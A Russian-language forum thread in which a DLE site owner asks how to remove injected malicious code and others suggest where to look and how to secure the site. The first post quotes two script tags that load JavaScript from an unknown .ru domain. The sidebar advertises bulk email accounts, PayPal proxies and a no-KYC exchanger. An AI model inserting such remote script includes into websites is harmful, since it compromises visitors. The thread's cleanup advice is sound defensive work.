Посторонний скрипт в DLE
Страницы: 1
Посторонний скрипт в DLE
Здравствуйте!
Вот увидел в Яндекс Вебмастере что на сайте обнаружен вредоносный код, так вот зашёл на свой сайт и действительно он там оказался.

Код
<script async="async" type="text/javascript" src="http://bhq6bimdfwwo857xdurp.ru/b93a29e4fa41e0c27d1d89fc94ec24b6.js?in">
</script><script async="async" type="text/javascript" src="http://bhq6bimdfwwo857xdurp.ru/896c62ef496dc5a210eb846c4ef4c5d8.js?in"></script>


Где можно его поискать? Вылазит он в краткой новости и в полной новости, после текста. Изменения явно в файлах движка, но вот отыскать его не удалось. Может кто посоветует... Заранее благодарен!
p.s. в файлах конфиг.пхп и бдконфиг.пхп посмотрел.
ищите по фтп или как удобно (через хостера) файлы с недавней датой изменения.
также помогает поиск строки кода, в частности http://bhq6bim
часто делают инекцию в каталоги \engine\modules или \ engine\inc 
А всё нашёл. Засрали всю БД. Кто знает если я просто всё почищу это не повториться заново?
очень может, надо искать дырку и латать
Цитата
killer1000 пишет:
А всё нашёл. Засрали всю БД. Кто знает если я просто всё почищу это не повториться заново?
Где нашел? У меня такая же гадость появилась. Ничего не нахожу ни в файлах движка, ни в базе..
сперва пароль от фтп смените... а потом разбирайтесь со скриптами
проблема явно в .js
Это шеллы, их вливают через уязвимости в ДЛЕ. Советую обратиться к автору этого топика: www.cy-pr.com/forum/f80/t55113/
Если код в статье, то это в БД. При наличии свежей версии достаточно сделать перестроение публикаций в админке и из новостей код удалится. так же надо проверить файлы, в которых может быть вредоносный код:
index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php
Обязательно сменить все пароли (к БД, фтп, админка) и установить патчи безопасность в зависимости от версии скрипта, с оффсайта. Если стоит нулл, менять на "чистую" версию скрипта.
Цитата
ориться зан
>p.s. в файлах конфиг.пхп и бдконфиг.пхп посмотрел.Причем тут эти файлы? Если получили доступ к бд значит дырка на хостинге, а туда могли попасть через взлом фтп. 
Закрыть дырки надо, на оф. сайте заплатки лежат, была такая же херня, доступ был получен из кеша базы, что-то в этом роде.
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
14:13 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 
13:38 2Index - быстрая индексация страниц сайта и обратных ссылок 
12:44 РСЯ и тормоза сайта: Яндекс начал штрафовать за плохой PageSpeed? 
12:42 01.02. Апдейт 31.01 // Chrome готовит "чёрную метку" для ИИ? 
23:09 Как безопасно купить Гугл почту? 
13:45 Какой движок выбрать для форума? 
13:43 Нашел скрины выплат с Сапы за 2010 год. Пошел плакать 
15:54 Продам аккаунты Gmail USA IP | Gmail MIX IP | Outlook Old 
14:05 TETChange-Обменник криптовалют 
12:36 Nexulume.com Обменник без AML и KYC 
09:12 Swapwatch.org — Мониторинг криптовалютных обменников 
09:07 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
23:25 SOCKS5 приватные прокси на 30 дней для PayPal 
23:24 Google Voice аккаунты для бесплатных SMS и звонков 
12:41 Moltbook: Соцсеть для ботов, где людям закрыли рот. Началось? 
06:26 Ставки на супер тренды в спорте 
22:31 [AI] Бот за $600к советовал есть сыр с крысами. Нью-Йорк его (наконец-то) снес 
22:30 Точные прогнозы на футбол 
13:38 Осталось 3-5 месяцев до блокировки YouTube в России, — заявил Клименко 
07:11 Список обновленных тем пуст... 
17:02 Gartner обещал смерть SEO к 2026 году. Открываем метрику и проверяем